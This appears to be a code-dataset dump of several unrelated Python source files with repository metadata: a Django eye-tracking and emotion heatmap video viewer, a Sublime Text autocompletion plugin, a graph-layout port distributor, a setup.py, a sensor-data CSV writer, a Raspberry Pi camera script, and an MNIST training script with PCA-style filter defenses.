try: x, y, time = int(float(x)), int(float(y)), int(float(time)) except: x, y = 0, 0 try: width, height = int(width), int(height) except: width, height = 0, 0 VideoStat.objects.create(video_link= video.video_link, user_id= user.username, timestamp = time, emotions=emotion, coordinates=f'{x}:{y}', screen_width=width, screen_height=height) return JsonResponse({'ok': True}) def exportStats(request): ''' Recieves export request via ajax ''' # get video data entries = VideoStat.objects.filter(video_link=video.video_link) DOWNLOAD_PATH = Path('viewer/static/downloads') / video.video_link try: os.mkdir(DOWNLOAD_PATH) except: pass video_data = vimeo.new(f'https://vimeo.com/{video.video_link}') video_data.streams[0].download(quiet=False) video_width, video_height = str(video_data.streams[0]).split('@')[-1].split('x') video_width, video_height = int(video_width), int(video_height) # get video db entries heatmap_points = [] emotion_points = [] for e in entries: x,y = list(map(int, e.coordinates.split(':'))) time = int(e.timestamp) x *= video_width / int(e.screen_width) y *= video_height / int(e.screen_height) heatmap_points.append([x,y, time]) emotion_points.append([e.user_id, time//5000, e.emotions]) emotions = pd.DataFrame(emotion_points) emotions.columns = ['user_name', 'timestamp', 'emotion'] emotion_counts = [] for (ts, item) in emotions.groupby('timestamp'): COUNTER = { 'timestamp': item['timestamp'].iloc[0] * 5, 'angry': 0, 'disgusted': 0, 'fearful': 0, 'happy': 0, 'neutral': 0, 'sad': 0, 'surprised': 0, 'None': 0 } for index, count in item['emotion'].value_counts().items(): COUNTER[index] = count emotion_counts.append(COUNTER.values()) emotion_counts = pd.DataFrame(emotion_counts) emotion_counts.columns = COUNTER.keys() emotion_counts.to_csv(DOWNLOAD_PATH / 'out.csv', index = None) heatmapper = Heatmapper(point_strength=0.6, opacity=0.8) video_heatmapper = VideoHeatmapper(heatmapper) heatmap_video = video_heatmapper.heatmap_on_video_path( video_path=f'{video_data.title}.mp4', points=heatmap_points ) heatmap_video.write_videofile(str(DOWNLOAD_PATH / 'out.mp4'), bitrate="500k", fps=24) mp4_files = glob.glob(str('*.mp4')) for f in mp4_files: if f != 'out.mp4': os.remove(f) shutil.make_archive(str(DOWNLOAD_PATH), 'zip', str(DOWNLOAD_PATH)) shutil.rmtree(str(DOWNLOAD_PATH)) # time based graph fig = px.line(emotion_counts, x="timestamp", y=emotion_counts.columns[1:]) fig = plotly.graph_objs.Figure(fig.data, fig.layout) fig_json_1 = fig.to_json() # pie chart labels, counts = list(emotions['emotion'].value_counts().index), list(emotions['emotion'].value_counts().values) fig = go.Figure(data=[go.Pie(labels=labels, values=counts)]) fig_json_2 = fig.to_json() return JsonResponse({'ok': True, 'plotly_graph_1': fig_json_1, 'plotly_graph_2': fig_json_2})
27.713004
184
0.625405
from django.shortcuts import render from django.http import HttpResponse from django.contrib.auth.forms import UserCreationForm from django.contrib.auth import login, authenticate from django.contrib.auth.models import User from django.http import JsonResponse #################### # IMPORT OTHER LIBS #################### import os import numpy as np import seaborn as sns import cv2 from heatmappy import Heatmapper from heatmappy.video import VideoHeatmapper from PIL import Image import moviepy.editor as mp import urllib import glob import pandas as pd from pathlib import Path import shutil import vimeo_dl as vimeo import plotly.express as px import plotly import plotly.graph_objects as go from .models import Video, VideoStat EMOTIONS = [ 'angry', 'disgusted', 'fearful', 'happy', 'neutral', 'sad', 'surprised' ] # # Create your views here. # def index(request): # return render(request, 'index.html') heatmap_points = [] def index(request): ''' Renders login + main page ''' global user if request.method == 'POST': username = request.POST['username'] password = request.POST['password'] user = authenticate(username=username, password=password) if user is not None: # if user is authentificated data = Video.objects.all() response_data = { "video_data": data, "name" : username, "is_staff": user.is_staff, } return render(request, 'main.html', response_data) return render(request, 'index.html') else: form = UserCreationForm() return render(request, 'index.html', {'form': form}) def video(request, video_id): ''' Renders video page ''' global video video = list(Video.objects.all())[video_id-1] VideoStat.objects.filter(video_link= video.video_link, user_id= user.username).delete() response_data = { "name" : user.username, "video_name": video.video_name, "video_link": video.video_link, "is_staff": user.is_staff } return render(request, 'video.html', response_data) def calibrate(request): return render(request, 'calibration.html') def recievePoints(request): ''' Recieves gaze points via ajax request ''' x, y = request.GET['x'], request.GET['y'] time = request.GET['time'] width, height = request.GET['width'], request.GET['height'] username = request.GET['username'] try: expressions = urllib.parse.unquote(request.GET['expressions']).split(';') expressions = list(map(float, expressions)) except: expressions = [] try: emotion = EMOTIONS[np.argmax(expressions)] except: emotion = 'None' try: x, y, time = int(float(x)), int(float(y)), int(float(time)) except: x, y = 0, 0 try: width, height = int(width), int(height) except: width, height = 0, 0 VideoStat.objects.create(video_link= video.video_link, user_id= user.username, timestamp = time, emotions=emotion, coordinates=f'{x}:{y}', screen_width=width, screen_height=height) return JsonResponse({'ok': True}) def exportStats(request): ''' Recieves export request via ajax ''' # get video data entries = VideoStat.objects.filter(video_link=video.video_link) DOWNLOAD_PATH = Path('viewer/static/downloads') / video.video_link try: os.mkdir(DOWNLOAD_PATH) except: pass video_data = vimeo.new(f'https://vimeo.com/{video.video_link}') video_data.streams[0].download(quiet=False) video_width, video_height = str(video_data.streams[0]).split('@')[-1].split('x') video_width, video_height = int(video_width), int(video_height) # get video db entries heatmap_points = [] emotion_points = [] for e in entries: x,y = list(map(int, e.coordinates.split(':'))) time = int(e.timestamp) x *= video_width / int(e.screen_width) y *= video_height / int(e.screen_height) heatmap_points.append([x,y, time]) emotion_points.append([e.user_id, time//5000, e.emotions]) emotions = pd.DataFrame(emotion_points) emotions.columns = ['user_name', 'timestamp', 'emotion'] emotion_counts = [] for (ts, item) in emotions.groupby('timestamp'): COUNTER = { 'timestamp': item['timestamp'].iloc[0] * 5, 'angry': 0, 'disgusted': 0, 'fearful': 0, 'happy': 0, 'neutral': 0, 'sad': 0, 'surprised': 0, 'None': 0 } for index, count in item['emotion'].value_counts().items(): COUNTER[index] = count emotion_counts.append(COUNTER.values()) emotion_counts = pd.DataFrame(emotion_counts) emotion_counts.columns = COUNTER.keys() emotion_counts.to_csv(DOWNLOAD_PATH / 'out.csv', index = None) heatmapper = Heatmapper(point_strength=0.6, opacity=0.8) video_heatmapper = VideoHeatmapper(heatmapper) heatmap_video = video_heatmapper.heatmap_on_video_path( video_path=f'{video_data.title}.mp4', points=heatmap_points ) heatmap_video.write_videofile(str(DOWNLOAD_PATH / 'out.mp4'), bitrate="500k", fps=24) mp4_files = glob.glob(str('*.mp4')) for f in mp4_files: if f != 'out.mp4': os.remove(f) shutil.make_archive(str(DOWNLOAD_PATH), 'zip', str(DOWNLOAD_PATH)) shutil.rmtree(str(DOWNLOAD_PATH)) # time based graph fig = px.line(emotion_counts, x="timestamp", y=emotion_counts.columns[1:]) fig = plotly.graph_objs.Figure(fig.data, fig.layout) fig_json_1 = fig.to_json() # pie chart labels, counts = list(emotions['emotion'].value_counts().index), list(emotions['emotion'].value_counts().values) fig = go.Figure(data=[go.Pie(labels=labels, values=counts)]) fig_json_2 = fig.to_json() return JsonResponse({'ok': True, 'plotly_graph_1': fig_json_1, 'plotly_graph_2': fig_json_2})
49
0
23
4c2dfc45b6d9a010d7e553bb3578d11ead92b7c0
3,079
py
Python
py_module_complete.py
Saevon/sublime_pymodule_complete
92d32dbe341c8278a5665bfa6311d3d4439b8537
[ "MIT" ]
null
null
null
py_module_complete.py
Saevon/sublime_pymodule_complete
92d32dbe341c8278a5665bfa6311d3d4439b8537
[ "MIT" ]
null
null
null
py_module_complete.py
Saevon/sublime_pymodule_complete
92d32dbe341c8278a5665bfa6311d3d4439b8537
[ "MIT" ]
null
null
null
import re from importlib import import_module import inspect import sublime_plugin import sublime SCOPE_RE = re.compile(r'\bsource\.python\b') LIB_MODULE_RE = re.compile(r'\bsupport\.module\.python\b') def grab_module(view, cursor): ''' Grabs the entire module path under the cursor ''' word_sel = view.word(cursor) pos = None # Are we on a dot right now? if view.substr(cursor.begin() - 1) == '.': pos = cursor.begin() - 1 # Are we on a word? elif view.substr(word_sel.begin() - 1) == '.': pos = word_sel.begin() - 1 # Not a module else: return False path_parts = [] while view.substr(pos) == '.': # Expand prefix to a word word_sel = view.word(pos - 1) word = view.substr(word_sel) path_parts.append(word) pos = word_sel.begin() - 1 # Format the module path path = '.'.join(reversed(path_parts)) return path
24.830645
93
0.602793
import re from importlib import import_module import inspect import sublime_plugin import sublime SCOPE_RE = re.compile(r'\bsource\.python\b') LIB_MODULE_RE = re.compile(r'\bsupport\.module\.python\b') def format_attr(attr, module): module_name = module.__name__ pretty_attr = attr snippet_attr = attr obj = getattr(module, attr) # if inspect.isclass(attr): if isinstance(attr, type): pretty_attr = 'class {}()'.format(attr) elif callable(obj): pretty_attr = '{}()'.format(attr) snippet_attr = '{}'.format(attr) return ( pretty_attr + '\t' + module_name, snippet_attr, ) def grab_module(view, cursor): ''' Grabs the entire module path under the cursor ''' word_sel = view.word(cursor) pos = None # Are we on a dot right now? if view.substr(cursor.begin() - 1) == '.': pos = cursor.begin() - 1 # Are we on a word? elif view.substr(word_sel.begin() - 1) == '.': pos = word_sel.begin() - 1 # Not a module else: return False path_parts = [] while view.substr(pos) == '.': # Expand prefix to a word word_sel = view.word(pos - 1) word = view.substr(word_sel) path_parts.append(word) pos = word_sel.begin() - 1 # Format the module path path = '.'.join(reversed(path_parts)) return path class PythonAutoCompletion(sublime_plugin.EventListener): def __init__(self, *args, **kwargs): self.on_settings_update() self.watch_settings() super(PythonAutoCompletion, self).__init__(*args, **kwargs) def watch_settings(self): """Observe changes.""" self.unwatch_settings() self._settings.add_on_change('PyComplete-settings-listener', self.on_settings_update) def unwatch_settings(self): self._settings.clear_on_change('PyComplete-settings-listener') def on_settings_update(self): self._settings = sublime.load_settings('PyComplete.sublime-settings') def on_query_completions(self, view, prefix, locations): cursor = view.sel()[-1] scopes = view.scope_name(cursor.begin()) # Skip unknown languages if not SCOPE_RE.match(scopes): return # Grab the current path module_name = grab_module(view, cursor) if module_name not in self._settings.get('modules'): return module = import_module(module_name) properties = dir(module) completions = [ # Convert to completions format format_attr(prop, module) for prop in properties # Filter out private properties if not prop.startswith('_') ] return ( # Completions completions, # Flags: ( # Disable document-word completions sublime.INHIBIT_WORD_COMPLETIONS # Disable .sublime-completions | sublime.INHIBIT_EXPLICIT_COMPLETIONS ), )
1,755
332
46
e586b33c1f0991a69d385f1562e8356586b2257e
13,430
py
Python
layeredGraphLayouter/crossing/abstractBarycenterPortDistributor.py
Nic30/layeredGraphLayouter
fa792fa8f4b3a781adfbd7756015fbf4b067315b
[ "MIT" ]
1
2020-02-07T15:07:15.000Z
2020-02-07T15:07:15.000Z
layeredGraphLayouter/crossing/abstractBarycenterPortDistributor.py
Nic30/layeredGraphLayouter
fa792fa8f4b3a781adfbd7756015fbf4b067315b
[ "MIT" ]
null
null
null
layeredGraphLayouter/crossing/abstractBarycenterPortDistributor.py
Nic30/layeredGraphLayouter
fa792fa8f4b3a781adfbd7756015fbf4b067315b
[ "MIT" ]
null
null
null
""" Calculates port ranks and distributes ports. The rank of a port is a floating point number that represents its position inside the containing layer. This depends on the node order of that layer and on the port constraints of the nodes. Port ranks are used by {@link ICrossingMinimizationHeuristics for calculating barycenter or median values for nodes. Furthermore, they are used in this class for distributing the ports of nodes where the order of ports is not fixed, which has to be done as the last step of each crossing minimization processor. There are different ways to determine port ranks, therefore that is done in concrete subclasses. """ from collections import defaultdict from math import inf from typing import List from layeredGraphLayouter.containers.constants import PortType, PortSide from layeredGraphLayouter.containers.lNode import LNode from layeredGraphLayouter.containers.lPort import LPort class AbstractBarycenterPortDistributor(): """ Constructs a port distributor for the given array of port ranks. All ports are required to be assigned ids in the range of the given array. :ivar portRanks: port ranks dict {port: rank} in which the results of ranks calculation are stored. """ # ######################################/ # Port Rank Assignment def calculatePortRanks_many(self, layer: List[LNode], portType: PortType): """ Determine ranks for all ports of specific type in the given layer. The ranks are written to the {@link #getPortRanks() array. :param layer: a layer as node array :param portType: the port type to consider """ #assert isinstance(layer, LNodeLayer), (layer, layer.__class__) calculatePortRanks = self.calculatePortRanks consumedRank = 0 for node in layer: consumedRank += calculatePortRanks(node, consumedRank, portType) def calculatePortRanks(self, node: LNode, rankSum: float, type_: PortType): """ Assign port ranks for the input or output ports of the given node. If the node's port constraints imply a fixed order, the ports are assumed to be pre-ordered in the usual way, i.e. in clockwise order north - east - south - west. The ranks are written to the {@link #getPortRanks() array. :param node: a node :param rankSum: the sum of ranks of preceding nodes in the same layer :param type: the port type to consider :return the rank consumed by the given node the following node's ranks start at {@code rankSum + consumedRank :see: {@link org.eclipse.alg.layered.intermediate.PortListSorter """ raise NotImplementedError("Implement on child class") # ######################################/ # Port Distribution def distributePorts(self, node, ports): """ * Distribute the ports of the given node by their sides, connected ports, and input or output * type. * * :param node * node whose ports shall be sorted """ self.inLayerPorts.clear() if ports: self.iteratePortsAndCollectInLayerPorts(node, ports) if self.inLayerPorts: self.calculateInLayerPortsBarycenterValues(node) def sortPorts(self, node): """ Sort the ports of a node using the given relative position values. These values are interpreted as a hint for the clockwise order of ports. :param node: a node """ portBarycenter = self.portBarycenter for side in node.iterSides(): side.sort(key=lambda p: portBarycenter[p])
42.365931
108
0.606925
""" Calculates port ranks and distributes ports. The rank of a port is a floating point number that represents its position inside the containing layer. This depends on the node order of that layer and on the port constraints of the nodes. Port ranks are used by {@link ICrossingMinimizationHeuristics for calculating barycenter or median values for nodes. Furthermore, they are used in this class for distributing the ports of nodes where the order of ports is not fixed, which has to be done as the last step of each crossing minimization processor. There are different ways to determine port ranks, therefore that is done in concrete subclasses. """ from collections import defaultdict from math import inf from typing import List from layeredGraphLayouter.containers.constants import PortType, PortSide from layeredGraphLayouter.containers.lNode import LNode from layeredGraphLayouter.containers.lPort import LPort def hasNestedGraph(node): return node.nestedLgraph is not None def isNotFirstLayer(length: int, currentIndex: int, isForwardSweep: bool): return currentIndex != 0 if isForwardSweep else currentIndex != length - 1 def portTypeFor(isForwardSweep: bool): return PortType.OUTPUT if isForwardSweep else PortType.INPUT class AbstractBarycenterPortDistributor(): """ Constructs a port distributor for the given array of port ranks. All ports are required to be assigned ids in the range of the given array. :ivar portRanks: port ranks dict {port: rank} in which the results of ranks calculation are stored. """ def __init__(self, random, graph): self.random = random r = self.portRanks = {} self.minBarycenter = inf self.maxBarycenter = 0.0 np = self.nodePositions = {} for i, la in enumerate(graph.layers): for node in la: np[node] = i for p in node.iterPorts(): r[p] = 0 self.portBarycenter = defaultdict(int) self.inLayerPorts = [] # ######################################/ # Port Rank Assignment def distributePortsWhileSweeping(self, nodeOrder, currentIndex: int, isForwardSweep: bool): self.updateNodePositions(nodeOrder, currentIndex) freeLayer = nodeOrder[currentIndex] side = PortSide.WEST if isForwardSweep else PortSide.EAST distributePorts_side = self.distributePorts_side if isNotFirstLayer(len(nodeOrder), currentIndex, isForwardSweep): if isForwardSweep: fixedLayer = nodeOrder[currentIndex - 1] else: fixedLayer = nodeOrder[currentIndex + 1] self.calculatePortRanks_many( fixedLayer, portTypeFor(isForwardSweep)) for node in freeLayer: distributePorts_side(node, side) self.calculatePortRanks_many( freeLayer, portTypeFor(not isForwardSweep)) for node in fixedLayer: if not hasNestedGraph(node): distributePorts_side(node, PortSide.opposite(side)) else: for node in freeLayer: distributePorts_side(node, side) # Barycenter port distributor can not be used with always improving crossing minimization heuristics # which do not need to count. return False def calculatePortRanks_many(self, layer: List[LNode], portType: PortType): """ Determine ranks for all ports of specific type in the given layer. The ranks are written to the {@link #getPortRanks() array. :param layer: a layer as node array :param portType: the port type to consider """ #assert isinstance(layer, LNodeLayer), (layer, layer.__class__) calculatePortRanks = self.calculatePortRanks consumedRank = 0 for node in layer: consumedRank += calculatePortRanks(node, consumedRank, portType) def calculatePortRanks(self, node: LNode, rankSum: float, type_: PortType): """ Assign port ranks for the input or output ports of the given node. If the node's port constraints imply a fixed order, the ports are assumed to be pre-ordered in the usual way, i.e. in clockwise order north - east - south - west. The ranks are written to the {@link #getPortRanks() array. :param node: a node :param rankSum: the sum of ranks of preceding nodes in the same layer :param type: the port type to consider :return the rank consumed by the given node the following node's ranks start at {@code rankSum + consumedRank :see: {@link org.eclipse.alg.layered.intermediate.PortListSorter """ raise NotImplementedError("Implement on child class") # ######################################/ # Port Distribution def distributePorts_side(self, node: LNode, side: PortSide): if not node.portConstraints.isOrderFixed(): # distribute ports in sweep direction and on north south side of # node. self.distributePorts(node, node.getPortSideView(side)) self.distributePorts(node, node.getPortSideView(PortSide.SOUTH)) self.distributePorts(node, node.getPortSideView(PortSide.NORTH)) # sort the ports by considering the side, type, and barycenter # values self.sortPorts(node) def distributePorts(self, node, ports): """ * Distribute the ports of the given node by their sides, connected ports, and input or output * type. * * :param node * node whose ports shall be sorted """ self.inLayerPorts.clear() if ports: self.iteratePortsAndCollectInLayerPorts(node, ports) if self.inLayerPorts: self.calculateInLayerPortsBarycenterValues(node) def iteratePortsAndCollectInLayerPorts(self, node, ports): minBarycenter = 0.0 maxBarycenter = 0.0 # a float value large enough to ensure that barycenters of south ports # work fine absurdlyLargeFloat = 2 * len(node.layer) + 1 # calculate barycenter values for the ports of the node dealWithNorthSouthPorts = self.dealWithNorthSouthPorts continueOnPortIteration = False inLayerPorts = self.inLayerPorts portRanks = self.portRanks portBarycenter = self.portBarycenter for port in ports: northSouthPort = port.side == PortSide.NORTH or port.side == PortSide.SOUTH sum_ = 0 if northSouthPort: # Find the dummy node created for the port portDummy = port.portDummy if (portDummy is None): continue sum_ += dealWithNorthSouthPorts(absurdlyLargeFloat, port, portDummy) else: # add up all ranks of connected ports for outgoingEdge in port.outgoingEdges: if outgoingEdge.dstNode.layer is node.layer: inLayerPorts.append(port) continueOnPortIteration = True break else: # outgoing edges go to the subsequent layer and are # seen clockwise connectedPort = outgoingEdge.dst sum_ += portRanks[connectedPort] if continueOnPortIteration: continueOnPortIteration = False continue for incomingEdge in port.incomingEdges: if incomingEdge.srcNode.layer is node.layer: inLayerPorts.append(port) continueOnPortIteration = True break else: # incoming edges go to the preceding layer and are seen # counter-clockwise connectedPort = incomingEdge.src sum_ -= portRanks[connectedPort] if continueOnPortIteration: continueOnPortIteration = False continue if port.getDegree() > 0: portBarycenter[port] = sum_ / port.getDegree() minBarycenter = min(minBarycenter, portBarycenter[port]) maxBarycenter = max(maxBarycenter, portBarycenter[port]) elif northSouthPort: # For northern and southern ports, the sum directly corresponds to the # barycenter value to be used. portBarycenter[port] = sum_ def calculateInLayerPortsBarycenterValues(self, node): # go through the list of in-layer ports and calculate their barycenter # values nodePositions = self.nodePositions nodeIndexInLayer = nodePositions[node] + 1 layerSize = len(node.layer) + 1 minBarycenter = self.minBarycenter maxBarycenter = self.maxBarycenter portBarycenter = self.portBarycenter for inLayerPort in self.inLayerPorts: # add the indices of all connected in-layer ports sum_ = 0 inLayerConnections = 0 for connectedPort in inLayerPort.getConnectedPorts(): if connectedPort.getNode().layer is node.layer: sum_ += nodePositions[connectedPort.getNode()] + 1 inLayerConnections += 1 # The port's barycenter value is the mean index of connected nodes. If that # value is lower than the node's index, most in-layer edges point upwards, so we want # the port to be placed at the top of the side. If the value is higher than the # nodes's index, most in-layer edges point downwards, so we want the port to be # placed at the bottom of the side. barycenter = sum_ / inLayerConnections portSide = inLayerPort.side if portSide == PortSide.EAST: if barycenter < nodeIndexInLayer: # take a low value in order to have the port above portBarycenter[inLayerPort] = minBarycenter - barycenter else: # take a high value in order to have the port below portBarycenter[inLayerPort] = maxBarycenter + \ (layerSize - barycenter) elif portSide == PortSide.WEST: if barycenter < nodeIndexInLayer: # take a high value in order to have the port above portBarycenter[inLayerPort] = maxBarycenter + barycenter else: # take a low value in order to have the port below portBarycenter[inLayerPort] = minBarycenter - \ (layerSize - barycenter) def dealWithNorthSouthPorts(self, absurdlyLargeFloat: float, port: LPort, portDummy: LNode): # Find out if it's an input port, an output port, or both input_ = False output = False for portDummyPort in portDummy.iterPorts(): if portDummyPort.origin == port: if portDummyPort.outgoingEdges: output = True elif portDummyPort.incomingEdges: input_ = True sum_ = 0.0 if input_ and input_ ^ output: # It's an input port the index of its dummy node is its inverted sortkey # (for southern input ports, the key must be larger than the ones # assigned to output ports or inputandoutput ports) if port.side == PortSide.NORTH: sum_ = -self.nodePositions[portDummy] else: sum_ = absurdlyLargeFloat - self.nodePositions[portDummy] elif output and input_ ^ output: # It's an output port the index of its dummy node is its sort key # (for northern output ports, the key must be larger than the ones assigned # to input ports or inputandoutput ports, which are negative and 0, # respectively) sum_ = self.nodePositions[portDummy] + 1.0 elif input_ and output: # It's both, an input and an output port it must sit between input and # output ports # North: input ports < 0.0, output ports > 0.0 # South: input ports > FLOAT_MAX / 2, output ports near zero if port.side == PortSide.NORTH: sum_ = 0.0 else: sum_ = absurdlyLargeFloat / 2 return sum_ def updateNodePositions(self, nodeOrder, currentIndex: int): layer = nodeOrder[currentIndex] nodePositions = self.nodePositions for i, node in enumerate(layer): nodePositions[node] = i def sortPorts(self, node): """ Sort the ports of a node using the given relative position values. These values are interpreted as a hint for the clockwise order of ports. :param node: a node """ portBarycenter = self.portBarycenter for side in node.iterSides(): side.sort(key=lambda p: portBarycenter[p])
9,466
0
258
b9bd1928a2c1d5f03cdbd0cf4d58af342f9134b6
592
py
Python
setup.py
villarrealas/deltasigma
b1c2e9f307d37064ed4163a2682be825b3a44bf2
[ "BSD-3-Clause" ]
null
null
null
setup.py
villarrealas/deltasigma
b1c2e9f307d37064ed4163a2682be825b3a44bf2
[ "BSD-3-Clause" ]
null
null
null
setup.py
villarrealas/deltasigma
b1c2e9f307d37064ed4163a2682be825b3a44bf2
[ "BSD-3-Clause" ]
null
null
null
from setuptools import setup, find_packages PACKAGENAME = "deltasigma" VERSION = "0.0.dev" setup( name=PACKAGENAME, version=VERSION, author="Antonio Villarreal", author_email="avillarreal@anl.gov", description="Source code for chopper / halotools implementation to calculate delta sigma.", long_description="Source code for chopper / halotools implementation to calculate delta sigma.", install_requires=["numpy", "halotools", "colossus", "yaml", "pyyaml", "psutil", "six"], packages=find_packages(), url="https://github.com/villarrealas/deltasigma" )
31.157895
100
0.724662
from setuptools import setup, find_packages PACKAGENAME = "deltasigma" VERSION = "0.0.dev" setup( name=PACKAGENAME, version=VERSION, author="Antonio Villarreal", author_email="avillarreal@anl.gov", description="Source code for chopper / halotools implementation to calculate delta sigma.", long_description="Source code for chopper / halotools implementation to calculate delta sigma.", install_requires=["numpy", "halotools", "colossus", "yaml", "pyyaml", "psutil", "six"], packages=find_packages(), url="https://github.com/villarrealas/deltasigma" )
0
0
0
9df0a549c8d74fd28425f7e25b04aa46f91804bb
3,055
py
Python
Python/utils/persistence.py
RemkoPr/smart_textile_public
ffb53b2f5d039f0ca0d84770f2775688f237da1a
[ "Apache-2.0", "MIT" ]
null
null
null
Python/utils/persistence.py
RemkoPr/smart_textile_public
ffb53b2f5d039f0ca0d84770f2775688f237da1a
[ "Apache-2.0", "MIT" ]
1
2021-12-21T22:15:04.000Z
2021-12-21T22:15:04.000Z
Python/utils/persistence.py
RemkoPr/smart_textile_public
ffb53b2f5d039f0ca0d84770f2775688f237da1a
[ "Apache-2.0", "MIT" ]
null
null
null
import itertools import os import csv from loguru import logger from datetime import * class SensorPersistence(Persistence): """ Writes sensor data to a buffer and periodically flushes to file system. """
37.716049
115
0.594763
import itertools import os import csv from loguru import logger from datetime import * class Persistence: def __init__(self, directory): self.directory = directory self.init_directory(self.directory) self.file_name = self.create_unique_file_name(directory) def init_directory(self, directory): """ Checks if directory exists, if not, creates it :param directory: directory to check """ if not os.path.exists(directory): ans = input("Make new directory (" + directory + ")? [Y/N] ") if ans.lower() == "y": os.makedirs(directory) elif ans.lower() == "n": raise NotADirectoryError("Data directory doesn't exist, creation cancelled by user.") else: raise ValueError("Invalid answer given, enter [Y] or [N].") def create_unique_file_name(self, directory): # Build the file name so that each experiment (a.k.a. each run of the code) saves data to a different file file_name = str(date.today()) file_number = 0 for file_in_dir in os.listdir(directory): if file_in_dir.startswith(file_name): val = int(file_in_dir[file_in_dir.find("[") + 1:file_in_dir.find("]")]) if val > file_number: file_number = val file_name = file_name + "[" + str(file_number + 1) + "].csv" return file_name class SensorPersistence(Persistence): """ Writes sensor data to a buffer and periodically flushes to file system. """ def __init__(self, devices, directory="./data/", buffer_size=10): super().__init__(directory) self.devices = devices self.buffer = [] self.max_buffer_size = buffer_size self.init_csv_file(self.directory, self.file_name) def init_csv_file(self, directory, file_name): # TODO: haal grid size van smart textile grid_width = grid_height = 7 header = ['PCB addr', 'timestamp', 'LowBattery'] + \ [f'sensor_value_{digital_pin}_{analog_pin}' for digital_pin, analog_pin in itertools.product(range(grid_width), range(grid_height))] with open(os.path.join(directory, file_name), 'w', newline='') as csv_file: csv_writer = csv.writer(csv_file, delimiter=';') csv_writer.writerow(header) def persist(self, data): self.buffer.append(data) if len(self.buffer) > self.max_buffer_size: self._persist_to_file() self.buffer = [] def _persist_to_file(self): with open(os.path.join(self.directory, self.file_name), 'a+', newline='') as csv_file: csv_writer = csv.writer(csv_file, delimiter=';') for all_pcb_sensor_values in self.buffer: for row in all_pcb_sensor_values: csv_writer.writerow(row) logger.info("Wrote to file")
2,020
657
140
83ed5ef1449300aba87baa249f1d49549d0f1227
318
py
Python
Python/CopyPasta/animation.py
escharf72/Engineering_4_Notebook
bcfd7edf74791cedc2519be66ac79246670116f3
[ "BSD-Source-Code" ]
1
2020-11-04T15:27:34.000Z
2020-11-04T15:27:34.000Z
Python/CopyPasta/animation.py
escharf72/Engineering_4_Notebook
bcfd7edf74791cedc2519be66ac79246670116f3
[ "BSD-Source-Code" ]
null
null
null
Python/CopyPasta/animation.py
escharf72/Engineering_4_Notebook
bcfd7edf74791cedc2519be66ac79246670116f3
[ "BSD-Source-Code" ]
null
null
null
from picamera import PiCamera from time import sleep from gpiozero import Button import keyboard button = keyboard.is_pressed('h') camera = PiCamera() while True: camera.start_preview() button.wait_for_press() print("Button has been pressed!") sleep(3) camera.capture('animateImage.jpg') camera.stop_preview()
19.875
35
0.77673
from picamera import PiCamera from time import sleep from gpiozero import Button import keyboard button = keyboard.is_pressed('h') camera = PiCamera() while True: camera.start_preview() button.wait_for_press() print("Button has been pressed!") sleep(3) camera.capture('animateImage.jpg') camera.stop_preview()
0
0
0
bcead883cb43a65442ccf599bda0b4064946fb5a
4,716
py
Python
bin/train-model.py
giuscri/thesis
d7aa0a8476f53ad304495b437841af1a8d6c87d4
[ "MIT" ]
null
null
null
bin/train-model.py
giuscri/thesis
d7aa0a8476f53ad304495b437841af1a8d6c87d4
[ "MIT" ]
10
2018-05-11T08:40:48.000Z
2018-06-29T16:14:27.000Z
bin/train-model.py
giuscri/thesis
d7aa0a8476f53ad304495b437841af1a8d6c87d4
[ "MIT" ]
null
null
null
#!/usr/bin/env python import os, sys, pickle import keras.backend as K import tensorflow as tf import numpy as np from argparse import ArgumentParser sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from datasets import mnist from models import (train, accuracy, save_to_file, fc_100_100_10, pca_filtered_model, fastica_filtered_model, incrementalpca_filtered_model, nmf_filtered_model, truncatedsvd_filtered_model, kernelpca_filtered_model) argument_parser = ArgumentParser() argument_parser.add_argument("--pca", action="store_true", help="use PCA image filter defense") argument_parser.add_argument("--fastica", action="store_true", help="use FastICA image filter defense") argument_parser.add_argument("--incrementalpca", action="store_true", help="use IncrementalPCA image filter defense") argument_parser.add_argument("--nmf", action="store_true", help="use IncrementalPCA image filter defense") argument_parser.add_argument("--truncatedsvd", action="store_true", help="use TruncatedSVD image filter defense") argument_parser.add_argument("--kernelpca", action="store_true", help="use KernelPCA image filter defense") argument_parser.add_argument("--n-components", type=int, nargs="+", default=[], help="number of components for image filters") argument_parser.add_argument("--epochs", type=int, default=-1, help="default: let the model choose") argument_parser.add_argument("--random-seed", action="store_true", help="initialize model with random seed") args = argument_parser.parse_args() PREFIX = os.environ.get('PREFIX', '.') X_train, y_train, X_test, y_test = mnist() if not args.random_seed: K.clear_session() tf.set_random_seed(1234) np.random.seed(1234) no_defense_model = fc_100_100_10() print(f"Training {no_defense_model.name}...") train(no_defense_model, X_train, y_train, args.epochs, verbose=True, stop_on_stable_weights=True, reduce_lr_on_plateau=True, stop_on_stable_weights_patience=60, reduce_lr_on_plateau_patience=30) print(f"Saving {no_defense_model.name}...") save_to_file(no_defense_model, PREFIX) for n_components in args.n_components: if args.pca: pca = cached(f"pca-{n_components}") filtered_model = pca_filtered_model(no_defense_model, X_train, n_components, pca=pca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.fastica: fastica = cached(f"fastica-{n_components}") filtered_model = fastica_filtered_model(no_defense_model, X_train, n_components, fastica=fastica) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.incrementalpca: incrementalpca = cached(f"incrementalpca-{n_components}") filtered_model = incrementalpca_filtered_model(no_defense_model, X_train, n_components, incrementalpca=incrementalpca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.nmf: nmf = cached(f"nmf-{n_components}") filtered_model = nmf_filtered_model(no_defense_model, X_train, n_components, nmf=nmf) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.truncatedsvd: truncatedsvd = cached(f"truncatedsvd-{n_components}") filtered_model = truncatedsvd_filtered_model(no_defense_model, X_train, n_components, truncatedsvd=truncatedsvd) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX) if args.kernelpca: kernelpca = cached(f"kernelpca-{n_components}") filtered_model = kernelpca_filtered_model(no_defense_model, X_train, n_components, kernelpca=kernelpca) print(f"Saving {filtered_model.name}...") save_to_file(filtered_model, PREFIX)
41.734513
85
0.632103
